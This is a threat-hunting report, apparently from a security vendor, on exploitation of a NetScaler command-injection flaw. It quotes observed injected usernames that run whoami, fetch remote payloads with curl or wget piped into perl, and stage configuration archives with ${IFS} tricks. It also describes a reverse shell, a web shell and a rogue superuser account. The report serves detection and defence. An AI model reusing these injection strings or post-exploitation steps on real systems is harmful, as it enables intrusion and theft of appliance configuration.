Cybereason is now LevelBlue. Proven endpoint protection, now with greater scale and expanded capabilities. Learn More

Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators

With contributions from James Rodriguez, Gus Staminatos, and Timmy Lister.

CVE-2026-88771 is a critical pre-authentication command-injection vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway. Citrix and security researchers have already documented the vulnerability and its underlying exploitation mechanism. This analysis focuses instead on exploitation activity identified by LevelBlue's Threat Hunt Operations & Research (THOR) team while hunting across multiple customer environments.

During these investigations, THOR identified malicious NetScaler authentication events containing attacker-controlled usernames designed to exploit CVE-2026-88771. The observed activity included basic command-execution testing, payload retrieval, configuration collection and staging, reverse-shell deployment, persistence, web-shell installation, and attempted exfiltration of NetScaler configuration data.

Analysis of infrastructure and second-stage payloads referenced within these commands provided additional artifacts that defenders can use to identify exploitation attempts and investigate whether successful post-exploitation activity occurred.

The indicators presented throughout this analysis are not exhaustive. They represent activity observed during our investigations and should be used alongside behavioral hunting and other available telemetry.

 

Observed Exploitation Activity

One of the most consistent characteristics across the identified events was attacker-controlled authentication data containing variations of the pitboss and NSPPE strings associated with exploitation of CVE-2026-88771.

Some observed attempts performed basic command-execution testing:

  • pitboss PPE unexpectedly died NSPPE;whoami;# X

Other attempts used curl or wget to retrieve additional payloads:

  • pitboss PPE unexpectedly died NSPPE;curl hxxp://64.94.85[.]67:443/update_c08937.pl | perl;# X

  • pitboss PPE unexpectedly died NSPPE;wget hxxp://31.56.197[.]72:9090/lula;# X

  • pitboss PPE unexpectedly died NSPPE;shell; curl hxxp://31.56.197[.]72:9090/lula;# X

The activity also included commands designed to collect NetScaler configuration data. One observed command attempted to copy ns.conf into a file within the NetScaler web directory:

  • pitboss PPE unexpectedly died NSPPE;cat /flash/nsconfig/ns.conf>/var/netscaler/logon/insight-new.js;# X

Another attempted to archive the entire /flash/nsconfig directory and place the resulting archive under LogonPoint:

  • pitboss PPE unexpectedly died NSPPE;tar${IFS}czf${IFS}/var/netscaler/logon/LogonPoint/xua.html${IFS}/flash/nsconfig;# X

We also observed a variation using command substitution rather than the more common semicolon-delimited format:

zq pitboss NSPPE X`tar${IFS}czf${IFS}/var/netscaler/logon/LogonPoint/xua.html${IFS}/flash/nsconfig`Y unexpectedly died

The use of ${IFS} provides an additional search opportunity because it allows commands to represent whitespace without using literal spaces.

Taken together, the observed commands demonstrate activity extending beyond basic vulnerability validation. The attempts included payload retrieval and execution as well as collection and staging of NetScaler configuration data.

 

Analysis of main.py

One of the second-stage payloads identified during the investigation was main.py, which was hosted at hxxp://23.27.143[.]20:9000/main.py. Analysis of the script showed that it targets /var/python/bin/customsnmpd, overwriting the file with Python code designed to establish a reverse shell.

Figure 1. Sample of main.py
Figure 1. Sample of main.py.

The newly written customsnmpd creates a TCP connection to 45.141.21[.]130 over port 443 and redirects standard input, output, and error to the socket before launching an interactive /bin/sh shell. The original main.py script also searches for processes associated with /var/python/bin/customsnmpd and terminates matching processes.

This provides defenders with several additional hunting opportunities beyond the original main.py file. Unexpected modification or execution of /var/python/bin/customsnmpd, connections from a NetScaler appliance to 45.141.21[.]130:443, or interactive shell activity associated with the modified process may indicate that exploitation progressed beyond initial command execution to deployment of the second-stage payload.

Dedicated to hunting and eradicating the world's most challenging threats.

SpiderLabs

Analysis of update_c08937.pl

Another second-stage payload identified during the investigation was update_c08937.pl, hosted at hxxp://64.94.85[.]67:443/update_c08937.pl. The observed exploitation command used curl to retrieve the script and pipe it directly into Perl, allowing it to execute without first being saved to a fixed location on disk.

Figure 2. Sample of update_c08937.pl
Figure 2. Sample of update_c08937.pl.

Analysis of the script showed several post-exploitation capabilities. It modifies /flash/nsconfig/ns.conf to create a local account named sec_monitor and assigns it the superuser role. It also archives the /flash/nsconfig directory into /tmp/update_result_3567cs.tgz and attempts to upload the resulting archive to 64.94.85[.]67:443, providing the attacker with NetScaler configuration data. Following the transfer attempt, the script removes the archive and deletes itself, reducing the number of artifacts remaining on disk.

The payload also changes the permissions of /bin/sh to 6555 and deploys a PHP web shell at /var/netscaler/logon/LogonPoint/.local_journal. It modifies /etc/httpd.conf to enable PHP execution and maps the web shell to URLs resembling legitimate NetScaler CSS resources, including LogonUISimple.html.style.min.css and randomized hexadecimal variations of the filename. The web shell provides remote command execution along with file upload and download functionality.

 

Post-Exploitation Artifacts

The behaviors within update_c08937.pl provide several artifacts that can help determine whether the payload successfully executed. High-value indicators include the sec_monitor account, changes to /flash/nsconfig/ns.conf, the temporary /tmp/update_result_3567cs.tgz archive, altered permissions on /bin/sh, and the .local_journal PHP web shell. The payload also modifies /etc/httpd.conf to expose the web shell through URLs resembling legitimate NetScaler CSS resources.

Investigators should also review network telemetry for connections to 64.94.85[.]67:443, particularly following an observed exploitation attempt. Because the payload deletes both the configuration archive and itself during execution, the absence of those files does not necessarily indicate that execution was unsuccessful.

 

Detection Opportunities

While the infrastructure, payload names, and file hashes observed during these investigations provide useful hunting pivots, the strongest detection opportunities come from the behaviors associated with exploitation and post-exploitation. IP addresses, filenames, and payloads can change, while command injection within authentication data, access to NetScaler configuration files, modification of appliance components, and creation of web-accessible artifacts provide broader opportunities to identify similar activity.

Signal

Target

Notes

Authentication fields containing pitboss, NSPPE, unexpectedly died, or ${IFS} alongside shell commands

NetScaler authentication logs

High-value indicator of CVE-2026-88771 exploitation attempts, particularly when combined with curl, wget, whoami, perl, python, tar, or cat.

Creation of .local_journal, insight-new.js, or xua.html within NetScaler web directories

/var/netscaler/logon/ and /var/netscaler/logon/LogonPoint/

Observed activity used these locations for web-shell deployment or staging NetScaler configuration data.

Unexpected access to or archiving of /flash/nsconfig

NetScaler configuration

Observed commands copied or archived configuration data for staging or attempted exfiltration.

Creation or modification of the sec_monitor account with superuser privileges

NetScaler local accounts and /flash/nsconfig/ns.conf

Behavior associated with update_c08937.pl and intended to establish privileged access.

Changes to /etc/httpd.conf, including PHP enablement or new Alias/SetHandler directives

NetScaler web-server configuration

The analyzed Perl payload modified the HTTP configuration to expose .local_journal as a PHP web shell through CSS-like URLs.

/bin/sh permissions changed to 6555

Appliance filesystem

update_c08937.pl explicitly performs chmod 6555 /bin/sh; unexpected permission changes should be investigated.

Modification or execution of /var/python/bin/customsnmpd

Appliance processes and filesystem

Observed main.py activity overwrote this file with code intended to establish a reverse shell.

Network connections following command-injection activity to infrastructure referenced within the injected command

Network telemetry

Connections shortly after an exploitation attempt may provide evidence that injected commands progressed to payload retrieval, C2, or attempted exfiltration.

 

Indicators of Compromise

The following indicators were identified during THOR investigations into CVE-2026-88771 exploitation activity across multiple customer environments. These indicators include exploitation infrastructure, payload-hosting and command-and-control infrastructure, malicious URLs, payload hashes, and post-exploitation artifacts. These indicators are not exhaustive and should be evaluated alongside surrounding activity and behavioral telemetry.

Indicator

Type

Description

70.172.58[.]168

IPv4

Source of NetScaler exploitation attempts

45.141.21[.]130

IPv4

Reverse-shell C2 infrastructure

162.243.36[.]88

IPv4

Source of NetScaler exploitation attempts

173.40.135[.]209

IPv4

Source of NetScaler exploitation attempts

47.230.224[.]154

IPv4

Source of NetScaler exploitation attempts

23.27.143[.]20

IPv4

Exploit source and payload host

62.133.62[.]80

IPv4

Payload-hosting infrastructure

64.94.85[.]67

IPv4

Exploit, payload, and exfiltration infrastructure

92.118.204[.]229

IPv4

Source of command-execution testing

87.224.84[.]82

IPv4

Source of configuration-staging attempt

31.56.197[.]72

IPv4

Payload-hosting infrastructure

hxxp://62.133.62[.]80:80/xd7h/x

URL

Payload download URL

hxxp://23.27.143[.]20:9000/main.py

URL

Python reverse-shell payload

hxxp://64.94.85[.]67:443/update_c08937.pl

URL

Perl post-exploitation payload

hxxp://64.94.85[.]67:443/update_result_3567cs.tgz

URL

Configuration exfiltration endpoint

hxxp://31.56.197[.]72:9090/lula

URL

Payload download URL

e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242c

SHA-256

main.py

974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938

SHA-256

update_c08937.pl

/var/netscaler/logon/LogonPoint/.local_journal

File

PHP web shell

/tmp/update_result_3567cs.tgz

File

Staged NetScaler configuration archive

/var/netscaler/logon/insight-new.js

File

Staged NetScaler configuration

/var/netscaler/logon/LogonPoint/xua.html

File

Staged configuration archive

sec_monitor

Account

Privileged account created by payload

 

Key Takeaways for Defenders

The activity observed during this hunt shows that CVE-2026-88771 exploitation was not limited to basic vulnerability testing. While some attempts used commands such as whoami to test command execution, others attempted to retrieve additional payloads, collect NetScaler configuration data, establish reverse shells, create privileged accounts, and deploy web shells.

The observed indicators provide useful pivots for identifying this specific activity, but defenders should not rely exclusively on known IP addresses, filenames, URLs, or hashes. Infrastructure and payloads can be changed quickly. Authentication data containing shell commands, unexpected access to /flash/nsconfig, creation of files within NetScaler web directories, changes to appliance configuration, and unusual network activity following an exploitation attempt provide more durable hunting opportunities.

Organizations should ensure affected NetScaler appliances are patched and review historical telemetry for evidence of exploitation that may have occurred before remediation. Where an exploitation attempt is identified, the investigation should continue beyond the initial authentication event to determine whether command execution or subsequent post-exploitation activity occurred. Failed authentication events should not be treated as evidence that the exploitation attempt itself was unsuccessful.

About the Author

Sean Shirley is a Cyber Threat Intelligence Analyst at LevelBlue specializing in threat hunting, malware analysis, and threat research. He focuses on analyzing emerging threats and translating technical findings into actionable intelligence for defensive operations. Follow Sean on LinkedIn.

About LevelBlue

LevelBlue secures what's next with intelligence-led security delivering visibility and speed to stop threats faster. As the world’s largest and most analyst-recognized pure-play managed security services provider, our AI-powered managed services and cyber expertise across managed, advisory, and incident response services help clients operate with confidence. Learn more about us.

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo